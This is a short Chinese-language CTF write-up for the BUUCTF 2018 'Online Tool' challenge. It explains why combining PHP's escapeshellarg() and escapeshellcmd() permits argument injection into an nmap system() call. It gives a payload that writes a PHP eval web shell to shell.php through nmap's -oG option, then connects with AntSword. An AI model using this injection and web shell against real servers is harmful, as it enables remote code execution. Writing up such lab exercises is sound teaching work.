[BUUCTF 2018]Online Tool

 

1.打开是个PHP代码审计，这个代码的漏洞出在俩个函数上

$host = escapeshellarg($host);  
$host = escapeshellcmd($host);
这俩个函数在一起用会出现问题

escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号，
    
escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。

反斜线（\）会在以下字符之前插入：
&#;`|\?~<>^()[]{}$*, \x0A 和 \xFF*。 *’ 和 “ 仅在不配对儿的时候被转义

 

拿个大佬的例子记录下

 

传入参数是：172.17.0.2' -v -d a=1 首先经过escapeshellarg处理后变成了'172.17.0.2''' -v -d a=1'， 即先对单引号转义，再用单引号将左右两部分括起来从而起到连接的作用。 再经过escapeshellcmd处理后变成'172.17.0.2'\'' -v -d a=1'， 这是因为escapeshellcmd对.以及最后那个不配对儿的引号进行了转义 最后执行的命令是curl '172.17.0.2'\'' -v -da=1'， 由于中间的\被解释为\而不再是转义字符，所以后面的'没有被转义，与再后面的'配对儿成了一个空白连接符。 所以可以简化为curl 172.17.0.2\ -v -d a=1'，即向172.17.0.2\发起请求，POST 数据为a=1’。

 

2.echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);

 

这里一个system来执行命令，应该就是从这里入手

 

3.nmap命令中 有一个参数-oG可以实现将命令和结果写到文件，可以利用这个写一个后门进去

 

4.payload：?host=' <?php eval($_POST["hhz"]);?> -oG shell.php ‘

 

5.如果不加引号的话，会被函数解析成字符串，如果不加空格，单引号会被解析，shell.php就成了shell.php//,后门用双引号也是防止被解析

 

6.接着回显出了文件名字，用蚁剑连接即可